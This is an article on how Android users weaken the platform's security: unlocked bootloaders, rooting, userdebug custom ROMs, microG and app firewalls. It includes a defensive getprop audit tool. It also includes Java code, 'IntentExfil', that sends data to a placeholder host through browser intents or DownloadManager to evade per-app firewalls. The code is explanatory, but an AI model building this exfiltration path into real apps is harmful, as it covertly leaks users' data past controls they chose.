Android by default has a strong security model with full system SELinux policies, strong app sandboxing, full verified boot, modern exploit mitigations like fine-grained forward-edge Control-Flow Integrity and ShadowCallStack, widespread use of memory-safe languages (Java) and more. This article talks about common ways people ruin the security model rather than criticisms of the security model itself.
Unlocking the bootloader in Android is a massive security risk. It disables verified boot, a fundamental part of the security model. Verified boot ensures the integrity of the base system and boot chain to prevent malware persistence. If an attacker has managed to compromise the entire system and gain extremely high privileges, verified boot will detect their modifications to the boot chain and system partitions at the next boot and reject the tampered image instead of booting it, so they cannot persist across a reboot. With the bootloader unlocked, that same attacker can flash a backdoored image and have it boot as if nothing were wrong.
Verified boot is not just for physical security as many people assume. Its main purpose is protection against remote attackers; the physical security is a nice side-effect.
Unlocking the bootloader is strongly discouraged.
Rooting your device allows an attacker to easily gain extremely high privileges. Android's architecture is built upon the principle of least privilege. By default, unrestricted root is found nowhere in the system thanks to the full system SELinux policy; even the init system is not unrestricted root. Exposing privileges far greater than any other part of the OS to the application layer is very silly.
It does not matter if you have to whitelist apps that have root. An attacker can fake user input, for example by clickjacking the root prompt with an overlay, or they can exploit vulnerabilities in apps that you have already granted root to.
People often try to argue that if root were insecure, Linux would not allow root. Linux does not have a security model like Android's. On the usual Linux system, gaining root is extremely easy.
The majority of custom ROMs ruin the security model by disabling verified boot, using userdebug builds, disabling SELinux, not including firmware updates, and a lot more. A common ROM that does many of these is LineageOS.
LineageOS uses userdebug builds, which add tons of debugging tools as extra attack surface, weaken SELinux policies and expose root access via adb. LineageOS requires an unlocked bootloader and disables verified boot, which is essential to verify the integrity of the OS. It does not implement rollback protection, so an attacker can downgrade the OS to an old version and exploit already patched vulnerabilities (you can tell, as the updater allows you to downgrade versions). It does not include firmware updates, which prevents you from getting new patches to fix vulnerabilities. And there are plenty more issues.
LineageOS (and most other custom ROMs) are focused on customizing the device and not privacy/security.
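A practical check for the states discussed above (unlocked bootloader, verified boot not enforcing, userdebug build, root-capable adb, stale or lagging patch level), written as an added example for this article rather than code from LineageOS or any other project. It parses the output of `adb shell getprop`, which prints one property per line as `[name]: [value]`, and reports each weakened property. The class and method names and the sample values are constructed for illustration; the property names are the standard ones. Two caveats: `ro.boot.vbmeta.device_state` is absent on devices that predate AVB 2.0 and will show up as a finding to judge by hand, and a locked bootloader with a custom OS signing key reports `yellow`, not `green`, so on such a device that finding is expected. Firmware (bootloader and radio) versions have no patch-level property and still need to be compared with the OEM's release notes.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.time.LocalDate;
import java.time.format.DateTimeParseException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Audits `adb shell getprop` output for de-hardened device states.
 * Usage:  adb shell getprop | java BootStateAudit.java
 *         java BootStateAudit.java --sample    (audits the constructed sample below)
 */
public final class BootStateAudit {
    // getprop prints one property per line as "[name]: [value]"
    private static final Pattern LINE = Pattern.compile("^\\[([^\\]]+)\\]: \\[(.*)\\]$");

    static Map<String, String> parseGetprop(List<String> lines) {
        Map<String, String> props = new LinkedHashMap<>();
        for (String line : lines) {
            Matcher m = LINE.matcher(line.trim());
            if (m.matches()) props.put(m.group(1), m.group(2));
        }
        return props;
    }

    private static void expect(List<String> out, Map<String, String> p,
                               String key, String wanted, String why) {
        String actual = p.getOrDefault(key, "<missing>");
        if (!actual.equals(wanted)) out.add(key + "=" + actual + " (want " + wanted + "): " + why);
    }

    private static LocalDate date(Map<String, String> p, String key) {
        try {
            return LocalDate.parse(p.getOrDefault(key, ""));
        } catch (DateTimeParseException e) {
            return null;  // property absent or not in YYYY-MM-DD form
        }
    }

    /** One finding per weakened property; an empty list means every check passed. */
    static List<String> audit(Map<String, String> p, LocalDate asOf) {
        List<String> out = new ArrayList<>();
        expect(out, p, "ro.boot.flash.locked", "1",
                "bootloader unlocked: anyone holding the device can flash a modified image");
        expect(out, p, "ro.boot.vbmeta.device_state", "locked",
                "AVB reports the device unlocked (absent on pre-AVB-2.0 devices)");
        expect(out, p, "ro.boot.verifiedbootstate", "green",
                "boot chain not verified against the OEM key (yellow=custom key, orange=unlocked, red=failed)");
        expect(out, p, "ro.boot.veritymode", "enforcing",
                "dm-verity not enforcing: modified system/vendor blocks are tolerated");
        expect(out, p, "ro.build.type", "user",
                "userdebug/eng build: extra debugging tools and a weaker SELinux policy");
        expect(out, p, "ro.debuggable", "0", "debuggable build: 'adb root' works");
        expect(out, p, "ro.secure", "1", "adbd starts as root");

        LocalDate sys = date(p, "ro.build.version.security_patch");
        LocalDate vendor = date(p, "ro.vendor.build.security_patch");
        if (sys == null) out.add("ro.build.version.security_patch missing or malformed");
        else if (sys.plusMonths(3).isBefore(asOf))
            out.add("security patch level " + sys + " is older than 3 months as of " + asOf);
        if (sys != null && vendor != null && vendor.isBefore(sys))
            out.add("vendor patch level " + vendor + " lags system patch level " + sys
                    + ": vendor updates are not being shipped");
        return out;
    }

    /** Constructed sample resembling a userdebug custom ROM on an unlocked device. */
    static final List<String> SAMPLE = Arrays.asList(
            "[ro.boot.flash.locked]: [0]",
            "[ro.boot.vbmeta.device_state]: [unlocked]",
            "[ro.boot.verifiedbootstate]: [orange]",
            "[ro.boot.veritymode]: [enforcing]",
            "[ro.build.type]: [userdebug]",
            "[ro.debuggable]: [1]",
            "[ro.secure]: [1]",
            "[ro.build.version.security_patch]: [2021-03-05]",
            "[ro.vendor.build.security_patch]: [2020-10-05]");

    public static void main(String[] args) throws IOException {
        List<String> lines = new ArrayList<>();
        boolean useSample = args.length > 0 && args[0].equals("--sample");
        if (!useSample) {
            BufferedReader in = new BufferedReader(new InputStreamReader(System.in));
            for (String l; (l = in.readLine()) != null; ) lines.add(l);
        }
        if (lines.isEmpty()) lines = SAMPLE;
        List<String> findings = audit(parseGetprop(lines), LocalDate.now());
        if (findings.isEmpty()) System.out.println("no weakened states found");
        for (String f : findings) System.out.println("WARN " + f);
    }
}
```

On the constructed sample the audit flags the unlocked bootloader (both properties), the orange boot state, the userdebug build, the debuggable flag and the vendor patch level trailing the system one; `ro.secure=1` and `ro.boot.veritymode=enforcing` pass, which is exactly why a single property is never enough to judge a device.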
MicroG is a common alternative to Google Play Services. Many people use it to get rid of Google tracking on their device, but many do not realise that this substantially worsens security as it requires signature spoofing, which allows apps to request to bypass signature verification. Some signature spoofing implementations restrict it to make it less bad, such as the one used by CalyxOS.
Firewalls such as AFWall+ or Netguard are regularly used on Android to attempt to block network access from a specific app, but these do not reliably work. Apps can use IPC to bypass the restrictions. Cutting off network access to an app does not prevent it from sending an intent to another app (such as the browser) to make the same connection on its behalf. Many apps already do this unintentionally, for example through the download manager.
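The bypass described above, as an added example written for this article (not code from the page, from AFWall+ or Netguard, or from any app): the app's own UID is what a per-UID firewall blocks, so it hands the request to a process whose UID is not blocked. `collector.example`, the class and method names and the payload are hypothetical. Path 1 works even if the app holds no INTERNET permission at all. Path 2 goes through the system download provider, which requires the caller to hold INTERNET, so it is closed by revoking that permission but not by an iptables rule on the app's UID.

```java
import android.app.DownloadManager;
import android.content.ActivityNotFoundException;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Environment;

/**
 * Why a per-UID firewall is not a security boundary: both paths below carry the same
 * payload to the same (hypothetical) host, but neither HTTP request leaves from this app's UID.
 */
public final class IntentExfil {
    // Hypothetical collection endpoint, for illustration only.
    private static final Uri COLLECT = Uri.parse("https://collector.example/c");

    /** Encode the payload into a URL so that whichever process opens it performs the request. */
    static Uri payloadUrl(String payload) {
        return COLLECT.buildUpon().appendQueryParameter("d", payload).build();
    }

    /**
     * Path 1: implicit ACTION_VIEW intent. The default browser (its own UID, with INTERNET)
     * fetches the URL. Visible to the user, so noisy, but it needs no permissions at all.
     * Returns false if no browser handles the intent.
     */
    static boolean viaBrowser(Context ctx, String payload) {
        Intent view = new Intent(Intent.ACTION_VIEW, payloadUrl(payload));
        view.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);  // required when not started from an Activity
        try {
            // startActivity resolves the target in the system server, so Android 11+ package
            // visibility rules do not get in the way the way resolveActivity() would.
            ctx.startActivity(view);
            return true;
        } catch (ActivityNotFoundException e) {
            return false;  // no app handles https:// URLs
        }
    }

    /**
     * Path 2: DownloadManager. The system download service, a separate network-capable
     * process, performs the HTTP request; this app only enqueues it. Writing into the app's
     * own external files directory needs no storage permission. Returns the download id.
     */
    static long viaDownloadManager(Context ctx, String payload) {
        DownloadManager dm = (DownloadManager) ctx.getSystemService(Context.DOWNLOAD_SERVICE);
        DownloadManager.Request req = new DownloadManager.Request(payloadUrl(payload))
                .setDestinationInExternalFilesDir(ctx, Environment.DIRECTORY_DOWNLOADS, "c.bin")
                .setNotificationVisibility(DownloadManager.Request.VISIBILITY_VISIBLE);
        return dm.enqueue(req);
    }
}
```

Note what each mitigation stops: revoking INTERNET closes path 2 and anything the app does with sockets itself, but path 1 still works because the browser is the one making the connection. Only putting the app in a separate profile, where there is no browser to hand the intent to, closes path 1 as well.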
The most effective way to block network access is to run the app in its own profile so it cannot communicate with apps outside of the profile and revoke the INTERNET permission from the app, as GrapheneOS allows you to do.
The best option for privacy/security on Android is to get a Pixel >=3 and flash GrapheneOS. GrapheneOS does not contain any tracking, unlike the stock OS on most devices, and includes many hardening enhancements such as a hardened memory allocator, hardened C library, hardened kernel, stricter SELinux policies and more.
Pixels are also the best hardware to use as they have lots of hardening other devices lack such as full verified boot with support for custom keys, Titan M, hardened basebands, a good IOMMU to isolate hardware devices, fine-grained forward-edge kernel Control-Flow Integrity, kernel ShadowCallStack, etc.
Remember that GrapheneOS cannot prevent you from ruining your privacy yourself. You still have to be careful regardless of the operating system.